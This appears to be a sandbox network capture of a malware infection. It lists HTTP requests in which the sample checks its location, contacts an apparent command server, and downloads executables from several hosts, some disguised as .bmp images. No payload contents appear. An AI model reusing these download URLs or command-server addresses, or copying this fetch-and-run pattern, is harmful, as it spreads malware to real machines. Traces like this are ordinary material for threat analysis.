186.2.171.3:80

GET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 186.2.171.3

HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 26 May 2022 02:09:15 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

208.95.112.1:80

GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:09:22 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 323
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44

8.8.8.8:53

199.59.242.150:443

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.listincode.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: openresty
Date: Thu, 26 May 2022 02:09:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: parking_session=3498b354-e0f4-7b21-f0b5-ab2dee6e8dfb; expires=Thu, 26-May-2022 02:24:33 GMT; Max-Age=900; path=/; HttpOnly
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sBMbFNTCm6IU2COuhYVF2/LD5p42ZV86JSZ/GRWAIhxgO9W8QYr6KkvWrrugAI+Bjzls7B7KUbQuTE3ia3V93A==
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

8.8.8.8:53

8.8.8.8:53

23.2.164.159:80

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x2.i.lencr.org

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-cert
Last-Modified: Fri, 04 Sep 2020 00:34:32 GMT
ETag: "5f518b98-464"
Content-Disposition: attachment; filename="ISRG Root X2 signed by ISRG Root X1.der"
Cache-Control: max-age=3600
Expires: Thu, 26 May 2022 03:09:32 GMT
Date: Thu, 26 May 2022 02:09:32 GMT
Content-Length: 1124
Connection: keep-alive

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

23.2.164.159:80

GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: x2.c.lencr.org

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/pkix-crl
Last-Modified: Mon, 26 Jul 2021 16:20:56 GMT
ETag: "60fee0e8-12b"
Cache-Control: max-age=3600
Expires: Thu, 26 May 2022 03:09:32 GMT
Date: Thu, 26 May 2022 02:09:32 GMT
Content-Length: 299
Connection: keep-alive

8.8.8.8:53

104.110.191.185:80

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgMPZ7wxkXBuI%2BFKfg90WTPENQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: e1.o.lencr.org

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 345
ETag: "E9DCA34E64903396A0C761DB4A8A7E8C250C3BED1C3D51BA8A630DDF6C9DF2BB"
Last-Modified: Mon, 23 May 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4337
Expires: Thu, 26 May 2022 03:21:49 GMT
Date: Thu, 26 May 2022 02:09:32 GMT
Connection: keep-alive

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

204.79.197.219:443

GET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 404 Not Found
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: F0F4E34EF3494E338C5C12EC811E1DB8 Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:09:53Z
Date: Thu, 26 May 2022 02:09:52 GMT
Content-Length: 0

204.79.197.219:443

GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 302 Found
Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=AxHmJSNWuXuE7CxmSXB6kwnaDzd5BwEGuUG%2FACNAfSk%3D&spr=https&se=2022-05-27T02%3A19%3A29Z&rscl=x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: AC2F9CA8407547E1BBCB55B8668CD6D5 Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:09:53Z
Date: Thu, 26 May 2022 02:09:52 GMT
Content-Length: 0

204.79.197.219:443

GET /download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 302 Found
Location: https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=AxHmJSNWuXuE7CxmSXB6kwnaDzd5BwEGuUG%2FACNAfSk%3D&spr=https&se=2022-05-27T02%3A19%3A29Z&rscl=x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: 55CEFBC825784CC5B191C7893CCDEAED Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:09:59Z
Date: Thu, 26 May 2022 02:09:59 GMT
Content-Length: 0

204.79.197.219:443

GET /download/symbols/index2.txt HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 404 Not Found
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: 7C0A9ACB5BEF4A60920CC5F01951876C Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:10:16Z
Date: Thu, 26 May 2022 02:10:15 GMT
Content-Length: 0

204.79.197.219:443

GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 302 Found
Location: https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=iEKlmrHE1goOgrYyFXanvJAQk7rWN6Av24MLFGhCHU0%3D&spr=https&se=2022-05-27T02%3A35%3A45Z&rscl=x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: 26B578F587354F83BB0414F904BAE90C Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:10:18Z
Date: Thu, 26 May 2022 02:10:17 GMT
Content-Length: 0

204.79.197.219:443

GET /download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: msdl.microsoft.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=37DBB50D9A5E6ECD00F2A48B9B6B6FF8; _EDGE_V=1

HTTP/1.1 302 Found
Location: https://vsblobprodscussu5shard58.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=iEKlmrHE1goOgrYyFXanvJAQk7rWN6Av24MLFGhCHU0%3D&spr=https&se=2022-05-27T02%3A35%3A45Z&rscl=x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3
X-Cache: TCP_MISS
X-MSEdge-Ref: Ref A: B98AB6C686FF4ACE9E45C20942C805D5 Ref B: AMS04EDGE1605 Ref C: 2022-05-26T02:10:19Z
Date: Thu, 26 May 2022 02:10:19 GMT
Content-Length: 0

8.8.8.8:53

13.84.56.16:443

GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=AxHmJSNWuXuE7CxmSXB6kwnaDzd5BwEGuUG%2FACNAfSk%3D&spr=https&se=2022-05-27T02%3A19%3A29Z&rscl=x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard30.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 8752128
Content-Type: application/octet-stream
Content-Language: x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d3473004-301e-00bf-16a5-70822e000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 26 May 2022 02:09:53 GMT

13.84.56.16:443

GET /b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&si=1&sig=AxHmJSNWuXuE7CxmSXB6kwnaDzd5BwEGuUG%2FACNAfSk%3D&spr=https&se=2022-05-27T02%3A19%3A29Z&rscl=x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard30.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 8752128
Content-Type: application/octet-stream
Content-Language: x-e2eid-3604f872-ffbd4ea3-884e773f-471b291f-session-0c6ae9f8-b90343ee-bbd225a4-ea4c90c3
Last-Modified: Mon, 12 Jun 2017 21:34:21 GMT
Accept-Ranges: bytes
ETag: "0x8D4B1DACA398C54"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d3473886-301e-00bf-02a5-70822e000000
x-ms-version: 2019-07-07
x-ms-creation-time: Fri, 05 May 2017 08:24:14 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 26 May 2022 02:09:59 GMT

8.8.8.8:53

104.20.68.143:443

GET /raw/A7dSG1te HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: pastebin.com

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:09:59 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 299
Last-Modified: Thu, 26 May 2022 02:05:00 GMT
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 7112f8cc6c47f969-BRU

212.193.30.21:80

GET /base/api/statistics.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 212.193.30.21

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:09:59 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 94
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

212.193.30.21:80

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 1137
Host: 212.193.30.21

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:03 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

212.193.30.21:80

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.193.30.21

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:04 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

8.8.8.8:53

162.159.133.233:443

GET /attachments/978284851323088960/978285804730339328/PL_Client.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: cdn.discordapp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:03 GMT
Content-Type: image/x-ms-bmp
Content-Length: 1811460
Connection: keep-alive
CF-Ray: 7112f8e0a9b16b4b-AMS
Accept-Ranges: bytes
Age: 218989
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=PL_Client.bmp
ETag: "8d505656356a73b4595320989d0f263e"
Expires: Fri, 26 May 2023 02:10:03 GMT
Last-Modified: Mon, 23 May 2022 13:18:31 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="gfe-default_product_name"
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"gfe-default_product_name","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/default_product_name"}]}
x-goog-generation: 1653311911588994
x-goog-hash: crc32c=ZegOWg==
x-goog-hash: md5=jVBWVjVqc7RZUyCYnQ8mPg==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1811460
X-GUploader-UploadID: ADPycdsSGacrEM61UEf7paE_hLESlRGoX_49D7_n7GsENwWnQ4Eqy3JEMzFMVN4YxV5rNVmScZIfmKk13jClD5UMQkCKJNB0EO2H
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Server: cloudflare

8.8.8.8:53

34.117.59.81:443

GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io

HTTP/1.1 200 OK
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 916
date: Thu, 26 May 2022 02:10:03 GMT
x-envoy-upstream-service-time: 32
strict-transport-security: max-age=2592000; includeSubDomains
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

45.144.225.57:80

HEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.144.225.57
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp

45.144.225.57:80

GET /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.144.225.57
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp

8.8.8.8:53

13.84.56.16:443

GET /b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=iEKlmrHE1goOgrYyFXanvJAQk7rWN6Av24MLFGhCHU0%3D&spr=https&se=2022-05-27T02%3A35%3A45Z&rscl=x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard58.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 404480
Content-Type: application/octet-stream
Content-Language: x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3
Content-MD5: XaOoge+ZHoAQ3u15nxparw==
Last-Modified: Thu, 15 Jun 2017 19:58:38 GMT
Accept-Ranges: bytes
ETag: "0x8D4B428EA2D0250"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7449bd99-e01e-00d0-10a5-702afa000000
x-ms-version: 2019-07-07
x-ms-creation-time: Thu, 04 May 2017 19:05:36 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 26 May 2022 02:10:18 GMT

13.84.56.16:443

GET /b-4712e0edc5a240eabf23330d7df68e77/98A14A45856422D571CDEA18737E156B89D4C85FE7A2C03E353274FC83996DE200.blob?sv=2019-07-07&sr=b&si=1&sig=iEKlmrHE1goOgrYyFXanvJAQk7rWN6Av24MLFGhCHU0%3D&spr=https&se=2022-05-27T02%3A35%3A45Z&rscl=x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3 HTTP/1.1
Accept-Encoding: gzip
User-Agent: Microsoft-Symbol-Server/10.0.10586.567
Host: vsblobprodscussu5shard58.blob.core.windows.net
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Content-Length: 404480
Content-Type: application/octet-stream
Content-Language: x-e2eid-7f094c65-dc8141b3-84954c22-19370e8f-session-0c6adb5b-b90343ee-bbd225a4-ea4c90c3
Content-MD5: XaOoge+ZHoAQ3u15nxparw==
Last-Modified: Thu, 15 Jun 2017 19:58:38 GMT
Accept-Ranges: bytes
ETag: "0x8D4B428EA2D0250"
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7449bf05-e01e-00d0-52a5-702afa000000
x-ms-version: 2019-07-07
x-ms-creation-time: Thu, 04 May 2017 19:05:36 GMT
x-ms-lease-status: unlocked
x-ms-lease-state: available
x-ms-blob-type: BlockBlob
x-ms-server-encrypted: true
Access-Control-Expose-Headers: Content-Length
Access-Control-Allow-Origin: *
Date: Thu, 26 May 2022 02:10:19 GMT

212.193.30.21:80

POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.193.30.21

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:24 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 4332
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

45.144.225.57:80

HEAD /download/Service.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.144.225.57
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 26 Mar 2022 05:56:51 GMT
ETag: "60600-5db18bedf5a37"
Accept-Ranges: bytes
Content-Length: 394752
Content-Type: image/x-ms-bmp

45.144.225.57:80

GET /download/Service.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.144.225.57
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 26 Mar 2022 05:56:51 GMT
ETag: "60600-5db18bedf5a37"
Accept-Ranges: bytes
Content-Length: 394752
Content-Type: image/x-ms-bmp

8.8.8.8:53

8.8.8.8:53

8.8.8.8:53

172.67.160.150:443

GET /TrdngAnlzr649.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.rahmancorp.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 26 May 2022 02:10:25 GMT
Content-Type: application/x-msdownload
Content-Length: 283136
Connection: keep-alive
last-modified: Wed, 25 May 2022 10:57:52 GMT
etag: "8b80b89-45200-5dfd3f1d76dd3"
vary: Accept-Encoding
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 3431
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YHVYOXBJ%2F2vDqmu%2BEsdBWk3S2q2c1qyt2TEtOEbU4BOCORiLu2ebdWuN2CtjKw93AmH3N7mhR%2BGImkWHzdO1xTi4F6UdPguKQgc%2BvtJs91fenXCv3gVJEC7Iz1isr8IQLSml%2B6k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7112f96b1ef296fb-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400

175.126.109.15:80

HEAD /vento/6523.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: colgefine.at
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.20.2
Date: Thu, 26 May 2022 02:10:26 GMT
Content-Type: application/octet-stream
Content-Length: 280576
Last-Modified: Thu, 26 May 2022 02:00:01 GMT
Connection: close
ETag: "628edf21-44800"
Accept-Ranges: bytes

193.233.48.74:80

HEAD /rrmix.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.233.48.74
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 26 May 2022 02:10:25 GMT
Content-Type: application/x-msdos-program
Content-Length: 424448
Connection: keep-alive
Last-Modified: Thu, 26 May 2022 02:10:02 GMT
ETag: "67a00-5dfe0b00476ff"
Accept-Ranges: bytes

193.233.48.74:80

GET /rrmix.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.233.48.74
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 26 May 2022 02:10:25 GMT
Content-Type: application/x-msdos-program
Content-Length: 424448
Connection: keep-alive
Last-Modified: Thu, 26 May 2022 02:10:02 GMT
ETag: "67a00-5dfe0b00476ff"
Accept-Ranges: bytes

212.193.30.29:80

HEAD /WW/file1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

HEAD /WW/file5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Content-Length: 0
Cache-Control: no-cache

HTTP/1.1 404 Not Found
Date: Thu, 26 May 2022 02:10:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1

212.193.30.29:80

HEAD /WW/file4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 212.193.30.29
Content-Length: 0
Cache-Control: no-cache

